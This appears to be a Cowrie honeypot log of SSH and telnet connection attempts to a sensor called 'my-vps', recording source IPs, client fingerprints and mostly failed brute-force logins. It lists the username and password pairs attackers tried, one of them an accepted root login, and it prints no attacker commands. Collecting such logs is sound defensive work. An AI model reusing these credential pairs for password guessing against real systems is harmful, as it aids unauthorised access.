{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38980,"dst_ip":"1.2.3.4","dst_port":22,"session":"e88386422b95","protocol":"ssh","message":"New connection: 212.227.235.229:38980 (1.2.3.4:22) [session: e88386422b95]","sensor":"my-vps","timestamp":"2025-09-09T06:33:09.559370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:33:09.561086Z","src_ip":"212.227.235.229","session":"e88386422b95"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:33:09.850426Z","src_ip":"212.227.235.229","session":"e88386422b95"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:33:11.043773Z","src_ip":"212.227.235.229","session":"e88386422b95"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:33:11.328685Z","src_ip":"212.227.235.229","session":"51ad3023c035"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:33:11.340033Z","src_ip":"212.227.235.229","session":"e88386422b95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64766,"dst_ip":"1.2.3.4","dst_port":22,"session":"b75ede5016ec","protocol":"ssh","message":"New connection: 212.227.235.229:64766 (1.2.3.4:22) [session: b75ede5016ec]","sensor":"my-vps","timestamp":"2025-09-09T06:33:11.585887Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:33:11.586866Z","src_ip":"212.227.235.229","session":"b75ede5016ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:33:11.698755Z","src_ip":"212.227.235.229","session":"b75ede5016ec"}
{"eventid":"cowrie.login.failed","username":"gitrun","password":"gitrun.123","message":"login attempt [gitrun/gitrun.123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:33:12.185478Z","src_ip":"212.227.235.229","session":"b75ede5016ec"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:33:13.299633Z","src_ip":"212.227.235.229","session":"b75ede5016ec"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":41084,"dst_ip":"1.2.3.4","dst_port":22,"session":"780b92fc90fa","protocol":"ssh","message":"New connection: 118.26.39.178:41084 (1.2.3.4:22) [session: 780b92fc90fa]","sensor":"my-vps","timestamp":"2025-09-09T06:33:18.159175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:33:18.159891Z","src_ip":"118.26.39.178","session":"780b92fc90fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:33:18.413643Z","src_ip":"118.26.39.178","session":"780b92fc90fa"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T06:33:19.470527Z","src_ip":"118.26.39.178","session":"780b92fc90fa"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:33:20.730807Z","src_ip":"118.26.39.178","session":"780b92fc90fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44235,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c5881e4f03a","protocol":"ssh","message":"New connection: 212.227.235.229:44235 (1.2.3.4:22) [session: 2c5881e4f03a]","sensor":"my-vps","timestamp":"2025-09-09T06:33:26.759768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:33:26.760733Z","src_ip":"212.227.235.229","session":"2c5881e4f03a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:33:27.003618Z","src_ip":"212.227.235.229","session":"2c5881e4f03a"}
{"eventid":"cowrie.login.failed","username":"z","password":"123456789","message":"login attempt [z/123456789] failed","sensor":"my-vps","timestamp":"2025-09-09T06:33:28.022128Z","src_ip":"212.227.235.229","session":"2c5881e4f03a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:33:29.276108Z","src_ip":"212.227.235.229","session":"2c5881e4f03a"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":47496,"dst_ip":"1.2.3.4","dst_port":22,"session":"97bdde0b9ecd","protocol":"ssh","message":"New connection: 92.118.39.62:47496 (1.2.3.4:22) [session: 97bdde0b9ecd]","sensor":"my-vps","timestamp":"2025-09-09T06:33:42.119399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:33:42.120345Z","src_ip":"92.118.39.62","session":"97bdde0b9ecd"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:33:42.157511Z","src_ip":"92.118.39.62","session":"97bdde0b9ecd"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-09-09T06:33:42.248359Z","src_ip":"92.118.39.62","session":"97bdde0b9ecd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58471,"dst_ip":"1.2.3.4","dst_port":22,"session":"24794c38ac5d","protocol":"ssh","message":"New connection: 212.227.235.229:58471 (1.2.3.4:22) [session: 24794c38ac5d]","sensor":"my-vps","timestamp":"2025-09-09T06:33:42.447005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:33:42.447869Z","src_ip":"212.227.235.229","session":"24794c38ac5d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:33:42.536057Z","src_ip":"212.227.235.229","session":"24794c38ac5d"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"1234567890","message":"login attempt [odoo/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T06:33:42.924344Z","src_ip":"212.227.235.229","session":"24794c38ac5d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:33:43.279252Z","src_ip":"92.118.39.62","session":"97bdde0b9ecd"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:33:44.012919Z","src_ip":"212.227.235.229","session":"24794c38ac5d"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":40870,"dst_ip":"1.2.3.4","dst_port":22,"session":"9149a7a3456f","protocol":"ssh","message":"New connection: 157.20.207.165:40870 (1.2.3.4:22) [session: 9149a7a3456f]","sensor":"my-vps","timestamp":"2025-09-09T06:33:50.091051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:33:50.092101Z","src_ip":"157.20.207.165","session":"9149a7a3456f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:33:50.276300Z","src_ip":"157.20.207.165","session":"9149a7a3456f"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Welcome@1234","message":"login attempt [ubuntu/Welcome@1234] failed","sensor":"my-vps","timestamp":"2025-09-09T06:33:51.052972Z","src_ip":"157.20.207.165","session":"9149a7a3456f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:33:52.238942Z","src_ip":"157.20.207.165","session":"9149a7a3456f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56741,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f2e62917f0b","protocol":"ssh","message":"New connection: 212.227.235.229:56741 (1.2.3.4:22) [session: 2f2e62917f0b]","sensor":"my-vps","timestamp":"2025-09-09T06:34:12.734035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:34:12.735276Z","src_ip":"212.227.235.229","session":"2f2e62917f0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:34:12.847614Z","src_ip":"212.227.235.229","session":"2f2e62917f0b"}
{"eventid":"cowrie.login.failed","username":"ftp2","password":"ftp2@2025","message":"login attempt [ftp2/ftp2@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:34:13.332694Z","src_ip":"212.227.235.229","session":"2f2e62917f0b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:34:14.445667Z","src_ip":"212.227.235.229","session":"2f2e62917f0b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56096,"dst_ip":"1.2.3.4","dst_port":22,"session":"56fb33d6ebb6","protocol":"ssh","message":"New connection: 217.72.205.35:56096 (1.2.3.4:22) [session: 56fb33d6ebb6]","sensor":"my-vps","timestamp":"2025-09-09T06:34:32.962514Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:34:32.963661Z","src_ip":"217.72.205.35","session":"56fb33d6ebb6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","size":524,"shasum":"1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:34:36.729395Z","src_ip":"212.227.235.229","session":"125be1aeadb1"}
{"eventid":"cowrie.session.closed","duration":180.27620553970337,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:34:36.734530Z","src_ip":"212.227.235.229","session":"125be1aeadb1"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":46932,"dst_ip":"1.2.3.4","dst_port":22,"session":"19706c776056","protocol":"ssh","message":"New connection: 118.26.39.178:46932 (1.2.3.4:22) [session: 19706c776056]","sensor":"my-vps","timestamp":"2025-09-09T06:34:40.441190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:34:40.442321Z","src_ip":"118.26.39.178","session":"19706c776056"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:34:40.695998Z","src_ip":"118.26.39.178","session":"19706c776056"}
{"eventid":"cowrie.login.failed","username":"node","password":"Password1","message":"login attempt [node/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T06:34:41.749208Z","src_ip":"118.26.39.178","session":"19706c776056"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:34:43.002846Z","src_ip":"118.26.39.178","session":"19706c776056"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35607,"dst_ip":"1.2.3.4","dst_port":23,"session":"e44b2a0df12c","protocol":"telnet","message":"New connection: 212.227.125.160:35607 (1.2.3.4:23) [session: e44b2a0df12c]","sensor":"my-vps","timestamp":"2025-09-09T06:34:43.261520Z"}
{"eventid":"cowrie.session.closed","duration":12.762027025222778,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:34:56.023491Z","src_ip":"212.227.125.160","session":"e44b2a0df12c"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":36966,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b2dafb66e3a","protocol":"ssh","message":"New connection: 157.20.207.165:36966 (1.2.3.4:22) [session: 1b2dafb66e3a]","sensor":"my-vps","timestamp":"2025-09-09T06:35:05.323235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:35:05.324591Z","src_ip":"157.20.207.165","session":"1b2dafb66e3a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:35:05.508708Z","src_ip":"157.20.207.165","session":"1b2dafb66e3a"}
